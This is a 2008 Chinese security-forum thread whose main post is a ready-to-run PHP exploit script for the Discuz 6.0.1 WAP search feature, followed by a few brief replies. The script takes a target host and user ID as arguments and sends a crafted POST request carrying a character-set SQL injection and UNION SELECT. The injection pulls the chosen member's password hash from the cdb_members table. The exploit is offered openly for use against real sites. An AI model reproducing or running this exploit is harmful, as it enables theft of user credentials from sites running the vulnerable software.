标题:
主题:discuz 最新wap漏洞利用程序php版BY 冰封浪子&小志
[打印本页]
作者:
柔肠寸断
时间:
2008-8-8 22:26
标题:
主题:discuz 最新wap漏洞利用程序php版BY 冰封浪子&小志
<?php
error_reporting(E_ALL&E_NOTICE);
print_r(”
+——————————————————————+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY 冰封浪子&小志
+——————————————————————+
“);
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo “Usage: php “.$argv[0].” host port path uid\n”;
echo “host: target server \n”;
echo “port: the web port, usually 80\n”;
echo “path: path to discuz\n”;
echo “uid : user ID you wanna get\n”;
echo “Example:\r\n”;
echo “php “.$argv[0].” localhost 80 1\n”;
exit;
}
$content =”action=search&searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=”.$uid.”/*&do=submit”;
$data = “POST /”.$path.”/index.php”.” HTTP/1.1\r\n”;
$data .= “Accept: */*\r\n”;
$data .= “Accept-Language: zh-cn\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “User-Agent: wap\r\n”;
$data .= “Host: “.$host.”\r\n”;
$data .= “Content-length: “.strlen($content).”\r\n”;
$data .= “Connection: Close\r\n”;
$data .= “\r\n”;
$data .= $content.”\r\n\r\n”;
$ock=fsockopen($host,$port);
if (!$ock) {
echo ‘No response from ‘.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
echo fgets($ock, 1024);
}
?>
作者:
猫咪
时间:
2008-8-9 08:08
额··
看不懂。。
作者:
wyw12340
时间:
2009-8-12 12:16
高人 支持 顶
作者:
林东东321
时间:
2010-3-14 15:52
提示:
作者被禁止或删除 内容自动屏蔽
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2